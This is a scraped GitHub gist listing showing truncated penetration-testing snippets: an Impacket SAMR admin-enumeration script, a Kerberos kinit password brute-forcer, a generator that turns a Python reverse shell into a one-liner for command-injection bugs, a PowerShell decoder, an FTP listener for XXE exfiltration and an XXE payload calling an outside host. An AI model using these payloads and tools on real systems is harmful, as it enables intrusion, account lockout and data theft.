Skip to content

Instantly share code, notes, and snippets.

View whit3chattr's full-sized avatar

whit3chattr

14 followers · 48 following
View GitHub Profile
@ropnop
ropnop / startTerminator.vbs
Created September 29, 2017 00:02
VBS Script to Launch Terminator through WSL
args = "-c" & " -l " & """DISPLAY=:0 terminator"""
WScript.CreateObject("Shell.Application").ShellExecute "bash", args, "", "open", 0
@ropnop
ropnop / lookupadmins.py
Last active February 10, 2025 16:53
Python script using Impacket to enumerate local administrators over SAMR
#!/usr/bin/env python
#
# Title: lookupadmins.py
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
#
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket
@ropnop
ropnop / kinit_brute.sh
Last active June 6, 2021 18:23
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
#!/bin/bash
# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
@ropnop
ropnop / make_oneliner.py
Last active October 15, 2025 16:46
Python script to convert a file to a oneliner exec command
#!/usr/bin/env python2
# Author: @ropnop (Ronnie Flathers)
# Simple script to ingest a Python file (e.g. a shell) and return a oneliner command
# Useful with command injection vulns
# Based entirely off of Metasploit's "reverse_python.rb" payload
# Credit to Brendan Coles <bcoles[at]gmail.com>
#
# Example:
# $ python make_oneliner.py pty_shell.py
anonymous
anonymous / psx.py
Created November 13, 2016 14:32
PowerShell decoder by @JohnLaTwC
## hacked together by @JohnLaTwC, Nov 2016, v 0.5
## This script attempts to decode common PowerShell encoded scripts. This version handles:
## * base64 data which encode unicode, gzip, or deflate encoded strings
## * it can operate on a file or stdin
## * it can run recursively in the event of multiple layers
## With apologies to @Lee_Holmes for using Python instead of PowerShell
##
import sys
import zlib
import re
@staaldraad
staaldraad / xxeftp.py
Created July 2, 2015 09:22
Python FTP server for XXE
#!/usr/env/python
from __future__ import print_function
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',2121))
s.listen(1)
print('XXE-FTP listening ')
conn,addr = s.accept()
print('Connected by %s',addr)
@staaldraad
staaldraad / XXE_payloads
Last active October 30, 2025 17:31
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>